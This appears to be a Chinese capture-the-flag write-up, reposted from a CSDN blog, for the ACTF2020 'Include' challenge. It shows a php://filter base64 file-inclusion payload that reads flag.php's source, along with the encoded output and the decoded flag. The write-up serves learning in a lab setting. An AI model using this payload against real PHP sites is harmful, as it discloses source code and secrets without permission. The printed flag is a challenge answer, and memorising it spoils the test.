乘风原创程序

  • [ACTF2020 新生赛]Include 1【文件包含】【读取代码】
  • 2020/7/29 9:38:35
  • 进入靶场环境:
    http://3ff0893f-e04a-41e6-87ad-a39b1889535e.node3.buuoj.cn/
    在这里插入图片描述
    点击tips:
    在这里插入图片描述
    然后就啥也没了,但是url中有 ?file=flag.php 猜测文件包含漏洞,尝试
    文件包含直接读取的是文件,而不是文件源码,所以要想办法读取源码
    php://filter/read=convert.base64-encode/resource=xxx.php
    这个方法可以读取代码
    然后构造playload:

    ?file=php://filter/read=convert.base64-encode/resource=flag.php
    

    在这里插入图片描述
    然后对得到的字符串PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7NjNlMmIyYzAtNWY5Mi00NjJlLWFkYmYtZTA1ODhhMzQ0MjhjfQo=
    进行base64解密得到flag:

    <?php
    echo "Can you find out the flag?";
    //flag{63e2b2c0-5f92-462e-adbf-e0588a34428c}
    

    本文地址:https://blog.csdn.net/qq_41523170/article/details/107617936